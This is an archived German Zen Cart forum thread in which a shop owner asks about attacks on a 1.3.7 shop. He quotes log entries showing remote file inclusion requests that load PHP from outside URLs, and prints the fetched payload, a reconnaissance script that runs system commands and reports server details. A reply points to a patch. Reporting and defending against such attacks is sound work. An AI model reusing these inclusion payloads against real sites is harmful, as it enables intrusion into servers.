Ankündigung

Einklappen
Keine Ankündigung bisher.

Angriffe auf 1.3.7 Shop

Einklappen
X
 
  • Filter
  • Zeit
  • Anzeigen
Alles löschen
neue Beiträge

    Angriffe auf 1.3.7 Shop

    Hallo,

    Es häufen sich massive Angriffe auf den Shop, wie ich glaube. In den Logfiles tauchen folgende Dinge immer wieder auf:

    Code:
    [15/Jul/2008:01:13:46 +0200] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://avast4ever.xpg.com.br/TT???
    oder

    Code:
    GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.legion-of-nemesis.eu/pkinc/rep/sites/include/data/id.txt???
    die zweite datei hab ich mal aufgerufen:

    Code:
    <?php
    function ConvertBytes($number)
    {
            $len = strlen($number);
            if($len < 4)
            {
                    return sprintf("%d b", $number);
            }
            if($len >= 4 && $len <=6)
            {
                    return sprintf("%0.2f Kb", $number/1024);
            }
            if($len >= 7 && $len <=9)
            {
                    return sprintf("%0.2f Mb", $number/1024/1024);
            }
       
            return sprintf("%0.2f Gb", $number/1024/1024/1024);
                               
    }
    
    echo "Osirys
    ";
    $un = @php_uname();
    $up = system(uptime);
    $id1 = system(id);
    $pwd1 = @getcwd();
    $sof1 = getenv("SERVER_SOFTWARE");
    $php1 = phpversion();
    $name1 = $_SERVER['SERVER_NAME'];
    $ip1 = gethostbyname($SERVER_ADDR);
    $free1= diskfreespace($pwd1);
    $free = ConvertBytes(diskfreespace($pwd1));
    if (!$free) {$free = 0;}
    $all1= disk_total_space($pwd1);
    $all = ConvertBytes(disk_total_space($pwd1));
    if (!$all) {$all = 0;}
    $used = ConvertBytes($all1-$free1);
    $os = @PHP_OS;
    
    
    echo "Naiz was here ..
    ";
    echo "uname -a: $un
    ";
    echo "os: $os
    ";
    echo "uptime: $up
    ";
    echo "id: $id1
    ";
    echo "pwd: $pwd1
    ";
    echo "php: $php1
    ";
    echo "software: $sof1
    ";
    echo "server-name: $name1
    ";
    echo "server-ip: $ip1
    ";
    echo "free: $free
    ";
    echo "used: $used
    ";
    echo "total: $all
    ";
    exit;
    Was hat das zu bedeuten? und ist das gefährlich, oder sind das nur unausgereifte Skript Kiddies, die nach ungepatchten Shops suchen?

    Wie würdet ihr vorgehen?

    Gruß

    Austin
    Zuletzt geändert von webchills; 06.09.2011, 18:41.

    #2
    Du solltest in der includes/application_top.php dringend den hier beschriebenen Patch einbauen:

    In der aktuellen 1.3.8a deutsch ist dieser Patch übrigens bereits enthalten.

    Kommentar

    Info zu diesem Forenarchiv:
    Mit Release von 1.5.7 wurde die deutsche Zen Cart Version auf eine reine DIY-Lösung umgestellt.
    Für einen Support via Forum stehen keine personellen und zeitlichen Ressourcen mehr zur Verfügung.
    Dieses Supportforum bleibt im Nur-Lesen-Modus als Wissensarchiv noch online verfügbar.
    PM Funktionalität, Registrierung und Posten neuer Beiträge sind deaktiviert.
    Zugriff auf Anhänge in den Postings ist auch ohne Registrierung/Einloggen möglich.
    FAQ und Downloadbereich des Forums wurden in die neue umfangreiche Knowledgebase auf der zen-cart-pro.at Website übernommen.

    Das Development der deutschen Zen Cart Version geht wie bisher auf Github weiter.
    Wir werden auch weiterhin neue Versionen bereitstellen und die Onlinedokumentation/Knowledgebase aktualisieren.
    Fehler in der Software können auf Github als Issues gemeldet werden.
    Follow us
    aktuelle version
    Zen Cart 1.5.7h deutsch
    vom 15.04.2024
    [Download]
    Lädt...
    X